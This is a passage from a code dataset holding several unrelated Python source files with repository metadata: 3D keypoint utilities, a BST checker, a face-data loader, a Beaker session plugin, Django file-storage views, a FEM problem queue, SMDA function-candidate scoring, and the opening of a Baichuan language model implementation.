torch.from_numpy(xy_keypt_src).float()\n xy_keypt_src_torch = xy_keypt_src_torch.transpose(1,2)\n rht = torch.cat((xy_keypt_src_torch,\n pred_src_z,\n ones), dim=1)\n rhs = torch.matmul(m_rshp, rht)\n return rhs\n\ndef convert_keypts_66_to_68(arr):\n kps_68 = np.zeros((68, 2))\n kps_68[0:60] = arr[0:60] # kpts 1 to 60 is kypts 1 to 60\n kps_68[60] = (arr[60-1]+arr[50-1]) / 2. # kpt 61 is the avg of kpts 60 and 50\n kps_68[61] = arr[60] # kpt 62 is keypt 61\n kps_68[62] = arr[61] # kpt 63 is keypt 62\n kps_68[63] = arr[62] # kpt 64 is keypt 63\n kps_68[64] = (arr[54-1] + arr[56-1]) / 2. # kpt 65 is the avg of kpts 54 and 56\n kps_68[65] = arr[63] # kpt 66 is keypt 64\n kps_68[66] = arr[64] # kpt 67 is keypt 65\n kps_68[67] = arr[65] # kpt 68 is keypt 66\n return kps_68\n\ndef convert_depth_66_to_68(arr):\n d_68 = np.zeros((68,))\n d_68[0:60] = arr[0:60] # kpts 1 to 60 is kypts 1 to 60\n d_68[60] = (arr[60-1]+arr[50-1]) / 2. # kpt 61 is the avg of kpts 60 and 50\n d_68[61] = arr[60] # kpt 62 is keypt 61\n d_68[62] = arr[61] # kpt 63 is keypt 62\n d_68[63] = arr[62] # kpt 64 is keypt 63\n d_68[64] = (arr[54-1] + arr[56-1]) / 2. 
# kpt 65 is the avg of kpts 54 and 56\n d_68[65] = arr[63] # kpt 66 is keypt 64\n d_68[66] = arr[64] # kpt 67 is keypt 65\n d_68[67] = arr[65] # kpt 68 is keypt 66\n return d_68\n\ndef shift_matrix(shift):\n mat = np.eye(4)\n mat[0,-1] = shift\n mat[1,-1] = shift\n return mat\n\ndef scale_matrix(scale):\n mat = np.eye(4)\n mat[0,0] = scale\n mat[1,1] = scale\n return mat\n\ndef rot_matrix_x(theta):\n \"\"\"\n theta: measured in radians\n \"\"\"\n mat = np.zeros((3,3)).astype(np.float32)\n mat[0, 0] = 1.\n mat[1, 1] = np.cos(theta)\n mat[1, 2] = -np.sin(theta)\n mat[2, 1] = np.sin(theta)\n mat[2, 2] = np.cos(theta)\n return mat\n\n\ndef rot_matrix_y(theta):\n \"\"\"\n theta: measured in radians\n \"\"\"\n mat = np.zeros((3,3)).astype(np.float32)\n mat[0, 0] = np.cos(theta)\n mat[0, 2] = np.sin(theta)\n mat[1, 1] = 1.\n mat[2, 0] = -np.sin(theta)\n mat[2, 2] = np.cos(theta)\n return mat\n\ndef rot_matrix_z(theta):\n \"\"\"\n theta: measured in radians\n \"\"\"\n mat = np.zeros((3,3)).astype(np.float32)\n mat[0, 0] = np.cos(theta)\n mat[0, 1] = -np.sin(theta)\n mat[1, 0] = np.sin(theta)\n mat[1, 1] = np.cos(theta)\n mat[2, 2] = 1.\n return mat\n\ndef affine_matrix_and_rotation(theta, mean, std, rot_mat):\n \"\"\"Construct an affine matrix of a rotation\n about the y axis\"\"\"\n\n shift1 = shift_matrix(-mean)\n scale1 = scale_matrix(1.0 / std)\n\n shift2 = shift_matrix(mean)\n scale2 = scale_matrix(std)\n \n rot_3x3 = rot_mat(theta) # 3x3\n rot = np.eye(4)\n rot[0:3,0:3] = rot_3x3\n \n result = np.dot(np.dot(np.dot(np.dot(shift1,scale1),rot),scale2),shift2)\n\n affine = np.hstack( (result[0:2,0:3],\n np.zeros((2,1)) ) )\n \n return affine\n\ndef affine_matrix_x(theta, mean, std):\n return affine_matrix_and_rotation(theta, mean, std,\n rot_matrix_x)\n\ndef affine_matrix_y(theta, mean, std):\n return affine_matrix_and_rotation(theta, mean, std,\n rot_matrix_y)\n\ndef affine_matrix_z(theta, mean, std):\n return affine_matrix_and_rotation(theta, mean, std,\n rot_matrix_z) \n\ndef compute_covar(preds, actuals, n_kps=66):\n return np.sum(np.diag(np.abs(np.corrcoef(preds, actuals, rowvar=0)[0:n_kps,n_kps::])))\n","repo_name":"joelmoniz/DepthNets","sub_path":"depthnet-pytorch/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7969,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"32"} +{"seq_id":"71073943132","text":"# You are given the root of a binary search tree. 
Return true if it is a valid binary search tree, and false otherwise.\n# Recall that a binary search tree has the property that all values in the left subtree are\n# less than or equal to the root, and all values in the right subtree are greater than or equal to the root.\n\n\nclass TreeNode:\n def __init__(self, key):\n self.left = None\n self.right = None\n self.key = key\n\n def __str__(self):\n return self.key\n\n\ndef is_bst(node):\n print(node.key, end=\" \")\n if (node.left is not None and node.left.key > node.key) \\\n or (node.right is not None and node.right.key < node.key):\n return False\n left_ok = True if node.left is None else is_bst(node.left)\n right_ok = True if node.right is None else is_bst(node.right)\n return left_ok and right_ok\n\n\n# 5\n# / \\\n# 3 7\n# / \\ /\n# 1 4 6\na = TreeNode(5)\na.left = TreeNode(3)\na.right = TreeNode(7)\na.left.left = TreeNode(1)\na.left.right = TreeNode(4)\na.right.left = TreeNode(6)\nprint(is_bst(a))\n\n# 5\n# / \\\n# 3 7\n# / \\ /\n# 1 4 8\n\na = TreeNode(5)\na.left = TreeNode(3)\na.right = TreeNode(7)\na.left.left = TreeNode(1)\na.left.right = TreeNode(4)\na.right.left = TreeNode(8)\nprint(is_bst(a))\n","repo_name":"lvoinescu/python-daily-training","sub_path":"check_bst_tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11571059901","text":"import os as os\nimport numpy as np\nfrom scipy.io import savemat\nfrom PIL import Image\n\nloaded_data = {}\nsize = 2304\nbase_path = 'faceData/CK+48/'\n\ndef get_image_path(label,file_name):\n return base_path+label+'/'+file_name\nlabels = os.listdir(base_path)\n#save the data in .mat format\nfor label in labels:\n file_list = os.listdir(base_path + label)\n print('{} : {}'.format(label,len(file_list)))\n X = np.zeros((size,1))\n for file_name in file_list:\n image = np.array(Image.open(get_image_path(label,file_name)).getdata()).reshape(size,1)\n X = np.hstack((X,image))\n loaded_data[label] = X[:,1:]\n\nsavemat('faceData/face_data.mat',loaded_data)\n\n#save the intire training set and data to .mat format\nX = np.zeros((size,1))\nY = np.zeros((1,1))\nfor i,label in enumerate(labels):\n t = loaded_data[label]\n X = np.hstack((X,t))\n Y = np.hstack((Y,(i+1)*np.ones((1,t.shape[1]))))\nsavemat('data_set.mat',{\n 'X' : X[:,1:],\n 'Y' : Y[:,1:],\n 'labels' : labels\n})\n","repo_name":"yeaung276/ML","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73839242330","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"repoze.who identifier plugin that persists to beaker sessions\"\nfrom past.builtins import basestring\nfrom builtins import object\nimport re\n\nfrom zope.interface import implementer\n\nfrom repoze.who.interfaces import IIdentifier\n\nSPLIT_RE = re.compile(r'\\s*,\\s*')\nPERSIST_KEYS = ['userdata', 'tokens']\n\n\n@implementer(IIdentifier)\nclass UseBeakerPlugin(object):\n \"Identify plugin that uses beaker\"\n\n def __init__( # pylint: disable=dangerous-default-value\n self, key_name='repoze.who.tkt',\n session_name='beaker.session', delete_on_logout=False,\n alsopersist=PERSIST_KEYS):\n \"\"\"Create an identification plugin storing at least the\n ``identity['repoze.who.userid']`` item in a beaker session.\n\n :param alsopersist: names of additional identity items saved in\n session. 
Default: ``alsopersist==['userdata']``\n :type alsopersist: sequence\n \"\"\"\n\n self.key_name = key_name\n self.session_name = session_name\n self.delete_on_logout = delete_on_logout\n self.persistkeys = alsopersist\n\n def identify(self, environ):\n \"\"\"Return identity from Beaker session\"\"\"\n\n _sess = self._get_beaker(environ)\n identity = _sess.get(self.key_name, None)\n if identity and isinstance(identity, dict) and \\\n identity.get('repoze.who.userid'):\n return identity\n\n def forget(self, environ, identity): # pylint: disable=unused-argument\n \"\"\"Does not return any headers, just deletes the session entry.\n \"\"\"\n\n _sess = self._get_beaker(environ)\n\n if self.delete_on_logout:\n # When the user logs out remove the session altogether\n _sess.delete()\n else:\n # Only erase the user name. If the user logs in again he will get\n # the same session\n try:\n del _sess[self.key_name]\n except BaseException:\n pass\n else:\n _sess.save()\n\n return []\n\n def remember(self, environ, identity):\n \"\"\"Does not return any headers, just saves identity to Beaker session\n \"\"\"\n _sess = self._get_beaker(environ)\n pidentity = _sess.get(self.key_name)\n if pidentity and isinstance(pidentity, dict):\n puserid = pidentity.get('repoze.who.userid')\n else:\n puserid = None\n\n iuserid = identity.get('repoze.who.userid')\n if puserid != iuserid:\n tkt_identity = {'repoze.who.userid': iuserid}\n for i in self.persistkeys:\n item = identity.get(i)\n if item:\n tkt_identity[i] = item\n _sess[self.key_name] = tkt_identity\n _sess.save()\n return []\n\n def _get_beaker(self, environ):\n \"\"\"Returns Beaker session\"\"\"\n _sess = environ.get(self.session_name, None)\n\n if not _sess:\n raise ValueError(\n 'No Beaker session (%s) in environment' % self.session_name)\n\n return _sess\n\n def __repr__(self):\n return '<%s %s>' % (self.__class__.__name__, id(self))\n\n\ndef make_plugin( # pylint: disable=dangerous-default-value\n key_name='repoze.who.tkt', session_name='beaker.session',\n delete_on_logout=False, alsopersist=PERSIST_KEYS):\n \"\"\"see :class:`UseBeakerPlugin`\"\"\"\n if isinstance(alsopersist, basestring):\n alsopersist = SPLIT_RE.split(alsopersist)\n return UseBeakerPlugin(\n key_name, session_name, delete_on_logout, alsopersist)\n","repo_name":"akissa/repoze.who-use_beaker","sub_path":"repoze/who/plugins/use_beaker.py","file_name":"use_beaker.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"37398677853","text":"import json\n\nimport requests\nfrom django.shortcuts import render, redirect, reverse\nfrom django.http import JsonResponse, HttpResponse\nfrom web.forms.file import FileModelForm, FilePutModelForm\nfrom web import models\nfrom django.forms import model_to_dict\nfrom web.utils.tencent.cos import delete_file, delete_files,credential\n\n\ndef file(request, project_id):\n parent_object = None\n folder_id = request.GET.get('folder', '')\n if folder_id.isdecimal():\n parent_object = models.FileRepository.objects.filter(id=folder_id, file_type=2,\n project=request.tracer.project).first()\n\n if request.method == 'GET':\n parent = parent_object\n navbar_list = []\n while parent:\n navbar_list.insert(0, model_to_dict(parent, ['id', 'name']))\n parent = parent.parent\n form = FileModelForm(request, parent_object)\n query_set = models.FileRepository.objects.filter(project=request.tracer.project)\n if parent_object:\n file_object_list = 
query_set.filter(parent=parent_object).order_by('-file_type')\n else:\n file_object_list = query_set.filter(parent=None).order_by('-file_type')\n return render(request, 'file.html',\n {\"form\": form,\n 'file_object_list': file_object_list,\n 'navbar_list': navbar_list,\n 'folder_id': folder_id})\n\n fid = request.POST.get('fid', '')\n edit_object = None\n if fid.isdecimal():\n edit_object = models.FileRepository.objects.filter(id=fid, file_type=2, project=request.tracer.project).first()\n if edit_object:\n form = FileModelForm(request, parent_object, data=request.POST, instance=edit_object)\n else:\n form = FileModelForm(request, parent_object, data=request.POST)\n if form.is_valid():\n form.instance.project = request.tracer.project\n form.instance.file_type = 2\n form.instance.parent = parent_object\n form.instance.update_user = request.tracer.user\n form.save()\n return JsonResponse({\"status\": True})\n return JsonResponse({\"status\": False, \"error\": form.errors})\n\n\ndef file_delete(request, project_id):\n fid = request.GET.get('fid')\n delete_object = models.FileRepository.objects.filter(id=fid, project=request.tracer.project).first()\n if delete_object.file_type == 1:\n # 删除文件:1.归还所使用的空间\n request.tracer.project.use_space -= delete_object.file_size\n request.tracer.project.save()\n # 删除文件:2.将cos中的文件也删除\n delete_file(request.tracer.project.region, request.tracer.project.bucket, delete_object.key)\n # 删除文件:3.将文件在数据库中删除\n delete_object.delete()\n return JsonResponse({\"status\": True})\n\n # 删除文件夹,同时删除该文件夹下的所有文件和文件夹\n # 该文件夹下所有文件的使用容量汇总,用户归还项目空间容量\n total_size = 0\n # 该文件夹下所有文件的key\n key_list = []\n # 该文件夹下所有的文件夹列表\n folder_list = [delete_object, ]\n # 循环文件夹列表,找出数据库中的以该文件夹为父级目录的所有文件夹和文件\n for folder in folder_list:\n # 找出数据库中的以该文件夹为父级目录的所有文件夹和文件\n child_list = models.FileRepository.objects.filter(project=request.tracer.project, parent=folder).order_by(\n '-file_type')\n for child in child_list:\n if child.file_type == 2:\n # 如果是文件夹,加入文件夹列表\n folder_list.append(child)\n else:\n # 如果是文件,将文件大小汇总,并将文件的key加入key列表\n total_size += child.file_size\n key_list.append({\"Key\": child.key})\n # 归还使用空间\n request.tracer.project.use_space -= total_size\n request.tracer.project.save()\n # 删除cos中的所有文件\n delete_files(request.tracer.project.region, request.tracer.project.bucket, key_list)\n # 删除数据库中的所有文件和文件夹\n delete_object.delete()\n return JsonResponse({\"status\": True})\n\n\ndef cos_credential(request, project_id):\n \"\"\" 获取cos上传临时凭证 \"\"\"\n per_file_limit = request.tracer.price_policy.per_file_size * 1024 * 1024\n total_file_limit = request.tracer.price_policy.project_space * 1024 * 1024 * 1024\n\n total_size = 0\n file_list = json.loads(request.body.decode('utf-8'))\n for item in file_list:\n # 文件的字节大小 item['size'] = B\n # 单文件限制的大小 M\n # 超出限制\n if item['size'] > per_file_limit:\n msg = \"单文件超出限制(最大{}M),文件:{},请升级套餐。\".format(request.tracer.price_policy.per_file_size, item['name'])\n return JsonResponse({'status': False, 'error': msg})\n total_size += item['size']\n\n # 做容量限制:单文件 & 总容量\n\n # 总容量进行限制\n # request.tracer.price_policy.project_space # 项目的允许的空间\n # request.tracer.project.use_space # 项目已使用的空间\n if request.tracer.project.use_space + total_size > total_file_limit:\n return JsonResponse({'status': False, 'error': \"容量超过限制,请升级套餐。\"})\n\n data_dict = credential(request.tracer.project.bucket, request.tracer.project.region)\n return JsonResponse({'status': True, 'data': data_dict})\n\n\ndef file_post(request, project_id):\n \"\"\" 已上传成功的文件写入到数据 \"\"\"\n \"\"\"\n name: fileName,\n key: 
key,\n file_size: fileSize,\n parent: CURRENT_FOLDER_ID,\n # etag: data.ETag,\n file_path: data.Location\n \"\"\"\n\n # 根据key再去cos获取文件Etag和\"db7c0d83e50474f934fd4ddf059406e5\"\n\n # 把获取到的数据写入数据库即可\n form = FilePutModelForm(request, data=request.POST)\n if form.is_valid():\n # 通过ModelForm.save存储到数据库中的数据返回的isntance对象,无法通过get_xx_display获取choice的中文\n form.instance.file_type = 1\n\n form.instance.project = request.tracer.project\n form.instance.update_user = request.tracer.user\n form.instance.parent_id = request.POST.get(\"parent\")\n instance = form.save() # 添加成功之后,获取到新添加的那个对象(instance.id,instance.name,instance.file_type,instace.get_file_type_display()\n\n # 校验通过:数据写入到数据库\n\n # 项目的已使用空间:更新 (data_dict['file_size'])\n request.tracer.project.use_space += instance.file_size\n request.tracer.project.save()\n\n result = {\n 'id': instance.id,\n 'name': instance.name,\n 'file_size': instance.file_size,\n \"file_path\": instance.file_path,\n 'username': instance.update_user.username,\n 'datetime': instance.update_datetime.strftime('%Y{y}%m{m}%d{d} %H:%M').format(y='年', m='月', d='日'),\n 'download_url': reverse('web:file_download', kwargs={\"project_id\": project_id, 'file_id': instance.id})\n }\n return JsonResponse({'status': True, 'data': result})\n\n return JsonResponse({'status': False, 'data': form.errors})\n\n\ndef file_download(request, project_id, file_id):\n \"\"\" 下载文件 \"\"\"\n\n file_object = models.FileRepository.objects.filter(id=file_id, project_id=project_id).first()\n res = requests.get(file_object.file_path)\n\n # 文件分块处理(适用于大文件)\n data = res.iter_content()\n\n # 设置content_type=application/octet-stream 用于提示下载框\n response = HttpResponse(data, content_type=\"application/octet-stream\")\n from django.utils.encoding import escape_uri_path\n\n # 设置响应头:中文件文件名转义\n response['Content-Disposition'] = \"attachment; filename={};\".format(escape_uri_path(file_object.name))\n return response","repo_name":"WangKeSai/Task-tracking-system","sub_path":"bishe/web/views/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":8088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40652434704","text":"import numpy as np\n\nfrom modules.swarm_environments.mesh.mesh_refinement.fem_problem_circular_queue import FEMProblemCircularQueue\nfrom typing import Dict, Any, Union\n\n\nclass EvaluationFEMProblemCircularQueue(FEMProblemCircularQueue):\n def __init__(self, *,\n fem_config: Dict[Union[str, int], Any],\n random_state: np.random.RandomState = np.random.RandomState()):\n super().__init__(fem_config=fem_config, random_state=random_state)\n self._index_sampler = None\n num_pdes = fem_config.get(\"num_pdes\") # number of pdes to store. None, 0 or -1 means infinite\n self._current_index = 0\n self._max_index = num_pdes\n\n def next(self) -> None:\n \"\"\"\n Draws the next finite element problem. 
This method is called at the beginning of each episode and draws a\n (potentially new) finite element problem from the buffer.\n Returns:\n\n \"\"\"\n pde_idx = self._current_index % self._max_index\n self._current_index += 1\n\n return self._next_from_idx(pde_idx=pde_idx)\n\n @property\n def num_pdes(self):\n return self._max_index\n","repo_name":"NiklasFreymuth/ASMR","sub_path":"modules/swarm_environments/mesh/mesh_refinement/evaluation/evaluation_fem_problem_circular_queue.py","file_name":"evaluation_fem_problem_circular_queue.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"73230481691","text":"from binascii import hexlify\n\nfrom .definitions import COMMON_PROLOGUES\n\nclass FunctionCandidate(object):\n\n def __init__(self, binary_info, addr):\n self.bitness = binary_info.bitness\n self.addr = addr\n rel_start_addr = addr - binary_info.base_addr\n self.bytes = binary_info.binary[rel_start_addr:rel_start_addr + 5]\n self.lang_spec = None\n self.call_ref_sources = []\n self.finished = False\n self.is_symbol = False\n self.is_gap_candidate = False\n self.is_tailcall = False\n self.alignment = 0\n if addr % 4 == 0:\n self.alignment = 4\n elif addr % 16 == 0:\n self.alignment = 16\n self.analysis_aborted = False\n self.abortion_reason = \"\"\n self._score = None\n self._tfidf_score = None\n self._confidence = None\n self.function_start_score = None\n self.is_stub = False\n self.is_initial_candidate = False\n self.is_exception_handler = False\n\n def setTfIdf(self, tfidf_score):\n self._tfidf_score = tfidf_score\n\n def getTfIdf(self):\n return round(self._tfidf_score, 3)\n\n def getConfidence(self):\n if self._confidence is None:\n # based on evaluation over Andriesse, Bao, and Plohmann data sets\n weighted_confidence = 0.298 * (1 if self.hasCommonFunctionStart() else 0)\n if self._tfidf_score is not None:\n weighted_confidence += (\n 0.321 * (1 if self._tfidf_score < 0 else 0) +\n 0.124 * (1 if self._tfidf_score < -2 else 0) +\n 0.120 * (1 if self._tfidf_score < -4 else 0) +\n 0.101 * (1 if self._tfidf_score < -1 else 0) +\n 0.025 * (1 if self._tfidf_score < -8 else 0)\n )\n # above experiments show that multiple inbound call references are basically always indeed functions\n if len(self.call_ref_sources) > 1:\n self._confidence = 1.0\n # initially recognized candidates are also almost always functions as they follow this heuristic\n elif self.is_initial_candidate:\n self._confidence = round(0.5 + 0.5 * (weighted_confidence), 3)\n else:\n self._confidence = round(weighted_confidence, 3)\n return self._confidence\n\n def hasCommonFunctionStart(self):\n for length in sorted([int(l) for l in COMMON_PROLOGUES], reverse=True):\n byte_sequence = self.bytes[:length]\n if byte_sequence in COMMON_PROLOGUES[\"%d\" % length][self.bitness]:\n return True\n return False\n\n def getFunctionStartScore(self):\n if self.function_start_score is None:\n for length in sorted([int(l) for l in COMMON_PROLOGUES], reverse=True):\n byte_sequence = self.bytes[:length]\n if byte_sequence in COMMON_PROLOGUES[\"%d\" % length][self.bitness]:\n self.function_start_score = COMMON_PROLOGUES[\"%d\" % length][self.bitness][byte_sequence]\n break\n self.function_start_score = self.function_start_score if self.function_start_score else 0\n return self.function_start_score\n\n def addCallRef(self, source_addr):\n if source_addr not in self.call_ref_sources:\n self.call_ref_sources.append(source_addr)\n self._score = 
None\n\n def removeCallRefs(self, source_addrs):\n for addr in source_addrs:\n if addr in self.call_ref_sources:\n self.call_ref_sources.remove(addr)\n self._score = None\n\n def setIsTailcallCandidate(self, is_tailcall):\n self.is_tailcall = is_tailcall\n\n def setInitialCandidate(self, initial):\n self.is_initial_candidate = initial\n\n def setIsGapCandidate(self, gap):\n self.is_gap_candidate = gap\n\n def setLanguageSpec(self, lang_spec):\n self.lang_spec = lang_spec\n self._score = None\n\n def setIsSymbol(self, is_symbol):\n self.is_symbol = is_symbol\n self._score = None\n\n def setIsExceptionHandler(self, is_exception_handler):\n self.is_exception_handler = is_exception_handler\n self._score = None\n\n def setIsStub(self, is_stub):\n self.is_stub = is_stub\n self._score = None\n\n def setAnalysisAborted(self, reason):\n self.finished = True\n self.analysis_aborted = True\n self.abortion_reason = reason\n\n def setAnalysisCompleted(self):\n self.finished = True\n\n def isFinished(self):\n return self.finished\n\n def calculateScore(self):\n score = 0\n score += 10000 if self.is_symbol else 0\n score += 5000 if self.is_exception_handler else 0\n score += 1000 if self.is_stub else 0\n score += 100 if self.lang_spec is not None else 0\n score += self.getFunctionStartScore()\n num_call_refs = len(self.call_ref_sources)\n if num_call_refs >= 10:\n call_ref_score = 10 + int(num_call_refs / 10)\n else:\n call_ref_score = num_call_refs\n score += 10 * call_ref_score\n score += 1 if self.alignment else 0\n return score\n\n def getScore(self):\n if self._score is None:\n self._score = self.calculateScore()\n return self._score\n\n def __lt__(self, other):\n own_score = self.getScore()\n other_score = other.getScore()\n if own_score == other_score:\n return self.addr > other.addr\n return own_score < other_score\n\n def getCharacteristics(self):\n is_aligned = \"a\" if self.alignment else \"-\"\n is_finished = \"f\" if self.finished else \"-\"\n is_gap = \"g\" if self.is_gap_candidate else \"-\"\n is_initial = \"i\" if self.is_initial_candidate else \"-\"\n is_lang_spec = \"l\" if self.lang_spec is not None else \"-\"\n is_prologue = \"p\" if self.hasCommonFunctionStart() else \"-\"\n is_ref = \"r\" if self.call_ref_sources else \"-\"\n is_symbol = \"s\" if self.is_symbol else \"-\"\n is_tailcall = \"t\" if self.is_tailcall else \"-\"\n is_stub = \"u\" if self.is_stub else \"-\"\n is_aborted = \"x\" if self.analysis_aborted else \"-\"\n characteristics = is_initial + is_symbol + is_stub + is_aligned + is_lang_spec + is_prologue + is_ref + is_tailcall + is_gap + is_finished + is_aborted\n return characteristics\n\n def __str__(self):\n characteristics = self.getCharacteristics()\n prologue_score = \"%d\" % self.getFunctionStartScore()\n ref_summary = \"{}\".format(len(self.call_ref_sources)) if len(self.call_ref_sources) != 1 else \"{}: 0x{:x}\".format(len(self.call_ref_sources), self.call_ref_sources[0])\n return \"0x{:x}: {} -> {} (total score: {}), inref: {} | {}\".format(self.addr, hexlify(self.bytes), prologue_score, self.getScore(), ref_summary, characteristics)\n\n def toJson(self):\n return {\n \"addr\": self.addr,\n \"bytes\": self.bytes.hex(),\n \"alignment\": self.alignment,\n \"reason\": self.abortion_reason,\n \"num_refs\": len(self.call_ref_sources),\n \"characteristics\": self.getCharacteristics(),\n \"prologue_score\": self.getFunctionStartScore(),\n \"score\": self.calculateScore(),\n \"confidence\": self.getConfidence()\n 
}\n","repo_name":"danielplohmann/smda","sub_path":"smda/intel/FunctionCandidate.py","file_name":"FunctionCandidate.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"32"} +{"seq_id":"13234781770","text":"# Two ways of swapping values between variables without a third variable\n\n# First one, using arithmetic:\ndef swap_numbers(a, b):\n a = a - b\n b = a + b\n a = b - a\n return a, b\n\n# Second one, using xor operator:\ndef swap_numbers_xor(a, b):\n a = a ^ b\n b = a ^ b\n a = a ^ b\n return a, b\n\n","repo_name":"lucasbracher/classic_problems_in_python","sub_path":"tricks/swap_numbers.py","file_name":"swap_numbers.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29359755430","text":"import glob\n\nfrom transformers.deepspeed import is_deepspeed_zero3_enabled\n\nfrom ...utils.torch_utils import skip_init\nfrom .configuration_baichuan import BaichuanConfig\nfrom .generation_utils import build_chat_input, TextIterStreamer\n\nimport math\nfrom threading import Thread\nfrom typing import List, Optional, Tuple, Union\n\nimport torch\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\nfrom torch.nn import functional as F\nfrom transformers import PreTrainedModel, PretrainedConfig\nfrom transformers.activations import ACT2FN\nfrom transformers.generation.utils import GenerationConfig\nfrom transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast\nfrom transformers.utils import logging, ContextManagers\n\nimport os\nfrom contextlib import contextmanager\nfrom accelerate import init_empty_weights\n\nlogger = logging.get_logger(__name__)\n\ndef default_init(cls, *args, **kwargs):\n return cls(*args, **kwargs)\nskip_init_function = skip_init\ndef setup_model_profile(skip_init_flag=True):\n global skip_init_function\n if skip_init_flag:\n skip_init_function = skip_init\n else:\n skip_init_function = default_init\n\ntry:\n from xformers import ops as xops\nexcept ImportError:\n xops = None\n logger.warning(\n \"Xformers is not installed correctly. 
If you want to use memory_efficient_attention to accelerate training use the following command to install Xformers\\npip install xformers.\"\n )\n\n\ndef _get_interleave(n):\n def _get_interleave_power_of_2(n):\n start = 2 ** (-(2 ** -(math.log2(n) - 3)))\n ratio = start\n return [start * ratio**i for i in range(n)]\n\n if math.log2(n).is_integer():\n return _get_interleave_power_of_2(n)\n else:\n closest_power_of_2 = 2 ** math.floor(math.log2(n))\n return (\n _get_interleave_power_of_2(closest_power_of_2)\n + _get_interleave(2 * closest_power_of_2)[0::2][: n - closest_power_of_2]\n )\n\n\ndef _fill_with_neg_inf(t):\n \"\"\"FP16-compatible function that fills a tensor with -inf.\"\"\"\n return t.float().fill_(float(\"-inf\")).type_as(t)\n\n\ndef _buffered_future_mask(tensor, maxpos, alibi, attn_heads):\n _future_mask = torch.triu(_fill_with_neg_inf(torch.zeros([maxpos, maxpos])), 1)\n _future_mask = _future_mask.unsqueeze(0) + alibi\n new_future_mask = _future_mask.to(tensor)\n return new_future_mask[: tensor.shape[0] * attn_heads, :maxpos, :maxpos]\n\n\ndef _gen_alibi_mask(tensor, n_head, max_pos):\n slopes = torch.Tensor(_get_interleave(n_head))\n position_point = torch.arange(max_pos) - max_pos + 1\n position_point = position_point.unsqueeze(0).unsqueeze(0).expand(n_head, -1, -1)\n diag = torch.diag(position_point[0])\n position_point = position_point - diag.unsqueeze(0).unsqueeze(0).transpose(-1, -2)\n alibi = slopes.unsqueeze(1).unsqueeze(1) * position_point\n alibi = alibi.view(n_head, 1, max_pos)\n alibi_mask = torch.triu(_fill_with_neg_inf(torch.zeros([max_pos, max_pos])), 1)\n alibi_mask = alibi_mask.unsqueeze(0) + alibi\n return alibi_mask\n\n\nclass RMSNorm(torch.nn.Module):\n def __init__(self, hidden_size, epsilon=1e-6,**kwargs):\n super().__init__()\n self.weight = torch.nn.Parameter(torch.empty(hidden_size,**kwargs))\n self.epsilon = epsilon\n\n def forward(self, hidden_states):\n variance = hidden_states.to(torch.float32).pow(2).mean(-1, keepdim=True)\n hidden_states = hidden_states * torch.rsqrt(variance + self.epsilon)\n\n # convert into half-precision\n if self.weight.dtype in [torch.float16, torch.bfloat16]:\n hidden_states = hidden_states.to(self.weight.dtype)\n\n return self.weight * hidden_states\n\n\nclass MLP(torch.nn.Module):\n def __init__(\n self,\n hidden_size: int,\n intermediate_size: int,\n hidden_act: str,**kwargs\n ):\n super().__init__()\n self.gate_proj = torch.nn.Linear(hidden_size, intermediate_size, bias=False,**kwargs)\n self.down_proj = torch.nn.Linear(intermediate_size, hidden_size, bias=False,**kwargs)\n self.up_proj = torch.nn.Linear(hidden_size, intermediate_size, bias=False,**kwargs)\n self.act_fn = ACT2FN[hidden_act]\n\n def forward(self, x):\n return self.down_proj(self.act_fn(self.gate_proj(x)) * self.up_proj(x))\n\n\nclass BaichuanAttention(torch.nn.Module):\n def __init__(self, config: BaichuanConfig,**kwargs):\n super().__init__()\n self.config = config\n self.hidden_size = config.hidden_size\n self.num_heads = config.num_attention_heads\n self.head_dim = self.hidden_size // self.num_heads\n self.max_position_embeddings = config.model_max_length\n\n if (self.head_dim * self.num_heads) != self.hidden_size:\n raise ValueError(\n f\"hidden_size {self.hidden_size} is not divisible by num_heads {self.num_heads}\"\n )\n global skip_init_function\n init_method = skip_init_function\n self.W_pack = init_method(torch.nn.Linear,\n self.hidden_size, 3 * self.hidden_size, bias=False,**kwargs\n )\n self.o_proj = init_method(torch.nn.Linear,\n 
self.num_heads * self.head_dim, self.hidden_size, bias=False,**kwargs\n )\n\n def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):\n return (\n tensor.view(bsz, seq_len, self.num_heads, self.head_dim)\n .transpose(1, 2)\n .contiguous()\n )\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_value: Optional[Tuple[torch.Tensor]] = None,\n output_attentions: bool = False,\n use_cache: bool = False,\n ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:\n bsz, q_len, _ = hidden_states.size()\n\n proj = self.W_pack(hidden_states)\n proj = (\n proj.unflatten(-1, (3, self.hidden_size))\n .unsqueeze(0)\n .transpose(0, -2)\n .squeeze(-2)\n )\n query_states = (\n proj[0].view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2)\n )\n key_states = (\n proj[1].view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2)\n )\n value_states = (\n proj[2].view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2)\n )\n\n kv_seq_len = key_states.shape[-2]\n if past_key_value is not None:\n 